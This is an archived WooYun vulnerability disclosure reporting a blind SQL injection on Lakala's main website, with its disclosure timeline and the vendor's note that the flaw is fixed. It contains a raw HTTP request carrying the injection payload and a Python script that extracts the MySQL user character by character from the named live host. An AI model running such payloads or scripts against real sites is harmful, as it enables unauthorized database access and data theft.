缺陷编号:WooYun-2015-0128778
漏洞标题:拉卡拉主站MySQL注射(root,附验证脚本)
相关厂商:拉卡拉网络技术有限公司
漏洞作者:路人甲
提交时间:2015-07-23 20:32
公开时间:2015-09-11 07:42
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:厂商已经确认
Tags标签:
2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-08-07: 细节向核心白帽子及相关领域专家公开
2015-08-17: 细节向普通白帽子公开
2015-08-27: 细节向实习白帽子公开
2015-09-11: 细节向公众公开
拉卡拉主站MySQL注射(root,附验证脚本)
注射点:
1 2 3 4 5 6 7 8 9 10 11 |
POST /index.php?a=clckRelationHelp HTTP/1.1<br> Content-Length: 177<br> Content-Type: application/x-www-form-urlencoded<br> X-Requested-With: XMLHttpRequest<br> Referer: http://www.lakala.com<br> Cookie: PHPSESSID=0da719011942902fb844cd2bd1f40efb<br> Host: www.lakala.com<br> Connection: Keep-alive<br> Accept-Encoding: gzip,deflate<br> User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4<br> Accept: */*helpkey=%' and length(user())=16 and '%'='&lid=0&pageindex=1&pagesize=5&sid=0 |
参数helpkey和key可注入。
猜解user():
1 |
[Done] MySQL user is [email protected] |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
#encoding=utf-8<br> import httplib<br> import time<br> import string<br> import sys<br> import random<br> import urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded',<br> 'User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())<br> user = ''for i in range(1, 17):<br> for payload in payloads:<br> s = 'ascii(mid(user()from(%s)for(1)))=%s' % (i, ord(payload))<br> s = "helpkey=%%' and %s and '%%'='&lid=0&pageindex=1&pagesize=5&sid=0" % s<br> conn = httplib.HTTPConnection('www.lakala.com', timeout=30)<br> conn.request(method='POST', url='/index.php?a=clckRelationHelp', body=s, headers=headers)<br> html_doc = conn.getresponse().read()<br> conn.close()<br> print '.',<br> if html_doc.find('RecordCount:0') < 0:<br> user += payload<br> print '\n[in progress]', user,<br> breakprint '\n[Done] MySQL user is %s' % user |
参数过滤
危害等级:低
漏洞Rank:1
确认时间:2015-07-2807:40
升级产生漏洞,已修复,多谢了。
暂无
洞主怎么注入的,手工查的吗
原文连接
的情况下转载,若非则不得使用我方内容。